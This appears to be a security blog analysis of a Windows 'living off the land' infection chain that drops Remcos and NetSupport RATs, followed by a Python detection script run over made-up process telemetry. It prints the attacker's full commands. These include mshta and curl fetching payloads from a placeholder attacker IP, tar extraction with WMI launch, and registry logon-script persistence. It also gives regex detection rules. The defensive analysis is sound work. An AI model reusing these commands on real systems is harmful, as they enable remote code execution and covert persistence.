Can you use too many LOLBins to drop some RATs?
Recently, our team came across an infection attempt that stood out, not for its sophistication, but for how far the attacker pushed the "living off the land" approach. The end goal was to deploy Remcos, a Remote Access Trojan (RAT), and NetSupport Manager, a legitimate remote administration tool that is frequently abused as a RAT. Both give an attacker extensive control over an infected system, and both are typically delivered through multi-stage phishing or infection chains. The route the attacker took to get there was a veritable tour of Windows' built-in utilities, known as LOLBins (Living Off the Land Binaries).
The attack kicked off with a seemingly odd command: C:\Windows\System32\forfiles.exe /p c:\windows\system32 /m notepad.exe /c "cmd /c start mshta https://[attacker-ip]/web". By roping in forfiles.exe, a legitimate tool for running a command over a batch of files, the attacker muddied the waters: the /c payload runs once for every file matching the /m filter, so the real command (cmd.exe launching mshta.exe) appears as a child of forfiles.exe rather than of the process that started the chain, which makes the execution path harder for security tools to spot. The mshta command then fetched a remote HTA file that immediately spawned cmd.exe, which ran an elaborate PowerShell one-liner: powershell.exe -NoProfile -Command curl -s -L -o "<random>.pdf" [attacker-ip]/socket; mkdir "<random>"; tar -xf "<random>.pdf" -C "<random>"; Invoke-CimMethod Win32_Process Create "<random>\glaxnimate.exe". The curl here is the curl.exe binary that ships with Windows 10 and later (the -s -L -o switches belong to curl.exe, not to the Invoke-WebRequest cmdlet that the curl alias resolves to in Windows PowerShell); it downloaded a payload disguised as a PDF, which in reality was a TAR archive. tar.exe, also built into modern Windows, unpacked it into a randomly named folder, and Invoke-CimMethod used WMI (the Win32_Process class) rather than a direct Start-Process call to launch the result. The star of this show was glaxnimate.exe, a trojanized copy of a real open-source animation program, primed to further the infection on execution. Up to this point the delivery relies entirely on Windows' own tools: no custom dropper executable and no Office macro is involved.
Next, the malicious Glaxnimate copy began writing partial files to C:\ProgramData: SETUP.CAB.PART, PROCESSOR.VBS.PART and PATCHER.BAT.PART. This is classic malware staging: write the payload under a temporary name, then rename it into place once it is complete. Once fully written, Windows Script Host was invoked to execute the VBScript component: "C:\Windows\System32\WScript.exe" "C:\ProgramData\processor.vbs". The VBScript used IWshShell3.Run (the Run method of the WScript.Shell object) to spawn cmd.exe with a hidden window style, so the victim never sees a pop-up or a black console box. The batch file's job was to run expand setup.cab -F:* C:\ProgramData, using the built-in expand utility to extract all the contents of the previously dropped setup.cab archive into ProgramData, effectively unpacking the NetSupport client and its helper files. To make sure the tool survived a restart, the attackers opted for a stealthy registry route: reg add "HKCU\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\PATCHDIRSEC\client32.exe" /f. At logon, userinit.exe reads this value and runs whatever it points to, so it works as a per-user logon script without touching the well-known Run keys. Unlike those keys, UserInitMprLogonScript isn't on most people's list of usual suspects, lives in a hive the user can write to without elevation, and doesn't produce a visible window at logon.
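The chain above maps cleanly onto process-creation telemetry, and each hop leaves a distinctive parent/child and command-line pattern. The following is an added example of detection logic written for this page, not code from the original article or from any vendor: it runs a set of per-process rules over constructed Sysmon-style process-creation records that mimic the chain (the PIDs, the x1 folder name and the benign events are made up), then walks each process's ancestry so that a tree in which several of the rules fire is flagged as a whole, even though a single forfiles.exe or reg.exe event on its own might be legitimate.

```python
import ntpath
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 / Security 4688 style)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Per-process rules: (name, executable basenames, regex over the command line).
# Each one keys on the specific abuse seen in the chain, not on the binary alone:
# forfiles running a cleanup "cmd /c del" is common, forfiles launching mshta is not.
RULES = [
    ("forfiles_proxy_exec", ("forfiles.exe",),
     r'/c\s+"?.*\b(mshta|powershell|wscript|cscript|rundll32|regsvr32|certutil|bitsadmin)\b'),
    ("mshta_remote_url", ("mshta.exe",), r"\bhttps?:"),
    ("ps_curl_then_tar", ("powershell.exe",),
     r"\bcurl(\.exe)?\b.*\s-o\s.*\btar(\.exe)?\s+-xf\b"),
    ("ps_cim_process_create", ("powershell.exe",), r"Invoke-CimMethod\s+Win32_Process\s+Create"),
    ("wscript_from_programdata", ("wscript.exe", "cscript.exe"), r"\\ProgramData\\.*\.(vbs|vbe|js|jse)\b"),
    ("expand_cab_into_programdata", ("expand.exe",), r"-F:\*.*ProgramData"),
    ("reg_userinit_logon_script", ("reg.exe",), r"HKCU\\Environment\b.*UserInitMprLogonScript"),
]

# Constructed sample telemetry modelled on the chain described above (not real logs).
PS_CMD = ('powershell.exe -NoProfile -Command curl -s -L -o "x1.pdf" https://[attacker-ip]/socket; '
          'mkdir "x1"; tar -xf "x1.pdf" -C "x1"; Invoke-CimMethod Win32_Process Create "x1\\glaxnimate.exe"')
EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(101, 100, r"C:\Windows\System32\forfiles.exe",
              r'forfiles.exe /p c:\windows\system32 /m notepad.exe /c "cmd /c start mshta https://[attacker-ip]/web"'),
    ProcEvent(102, 101, r"C:\Windows\System32\cmd.exe", r"cmd /c start mshta https://[attacker-ip]/web"),
    ProcEvent(103, 102, r"C:\Windows\System32\mshta.exe", r"mshta https://[attacker-ip]/web"),
    ProcEvent(104, 103, r"C:\Windows\System32\cmd.exe", "cmd /c " + PS_CMD),
    ProcEvent(105, 104, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", PS_CMD),
    ProcEvent(106, 105, r"C:\Users\victim\x1\glaxnimate.exe", "glaxnimate.exe"),
    ProcEvent(107, 106, r"C:\Windows\System32\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\ProgramData\processor.vbs"'),
    ProcEvent(108, 107, r"C:\Windows\System32\cmd.exe", r"cmd /c C:\ProgramData\patcher.bat"),
    ProcEvent(109, 108, r"C:\Windows\System32\expand.exe", r"expand setup.cab -F:* C:\ProgramData"),
    ProcEvent(110, 108, r"C:\Windows\System32\reg.exe",
              r'reg add "HKCU\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\PATCHDIRSEC\client32.exe" /f'),
    # Benign noise: a log-rotation forfiles, an ordinary PowerShell, an unrelated reg add.
    ProcEvent(200, 100, r"C:\Windows\System32\forfiles.exe", r'forfiles /p C:\logs /m *.log /d -30 /c "cmd /c del @path"'),
    ProcEvent(201, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"powershell.exe -Command Get-ChildItem C:\temp"),
    ProcEvent(202, 100, r"C:\Windows\System32\reg.exe", r"reg add HKCU\Software\Foo /v Bar /d 1 /f"),
]


def match_rules(ev: ProcEvent) -> list[str]:
    """Names of the rules that fire on a single process-creation event."""
    exe = ntpath.basename(ev.image).lower()
    return [name for name, exes, pat in RULES
            if exe in exes and re.search(pat, ev.cmdline, re.IGNORECASE)]


def detect(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map pid -> rule names, keeping only processes on which at least one rule fired."""
    return {ev.pid: names for ev in events if (names := match_rules(ev))}


def chain_rules(events: list[ProcEvent], pid: int, hits: dict[int, list[str]]) -> set[str]:
    """Distinct rules that fired on pid or on any of its ancestors (guards against ppid cycles)."""
    by_pid = {ev.pid: ev for ev in events}
    seen: set[int] = set()
    found: set[str] = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        found.update(hits.get(pid, []))
        pid = by_pid[pid].ppid
    return found


def suspicious_chains(events: list[ProcEvent], threshold: int = 3) -> list[tuple[int, list[str]]]:
    """Processes whose ancestry accumulates at least `threshold` distinct LOLBin-abuse rules."""
    hits = detect(events)
    out = []
    for pid in sorted(hits):
        rules = chain_rules(events, pid, hits)
        if len(rules) >= threshold:
            out.append((pid, sorted(rules)))
    return out


if __name__ == "__main__":
    for pid, rules in suspicious_chains(EVENTS):
        print(f"pid {pid}: {len(rules)} rules on its ancestry -> {', '.join(rules)}")
```

The per-process rules alone already flag every malicious hop and none of the benign ones, but the ancestry walk is what turns six weak signals into one strong alert: by the time reg.exe writes UserInitMprLogonScript, its parent chain already contains wscript running from ProgramData, the curl-plus-tar PowerShell line, mshta fetching a URL and forfiles proxying the whole thing. In production you would key the same logic on Sysmon's ProcessGuid/ParentProcessGuid rather than reusable PIDs, and tune the threshold to your environment.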
This infection chain is a masterclass in LOLBin abuse and proof that attackers love turning Windows' own tools against its users. Every step of the way relies on a built-in Windows component: forfiles, mshta, curl, tar, the scripting engines, reg and expand. The more tools a threat actor abuses, the more distinctive the fingerprint of the chain becomes, because each unusual parent/child relationship and command line is one more thing to alert on. Stay vigilant, monitor for LOLBin abuse, and never trust a .pdf that needs tar.exe to open. Despite the heavy use of LOLBins, this attack was detected and blocked: the attacker's IP address was blocked, and both the Remcos RAT and the NetSupport client were detected as soon as they were dropped on the system.
To read the complete article see: Link to full article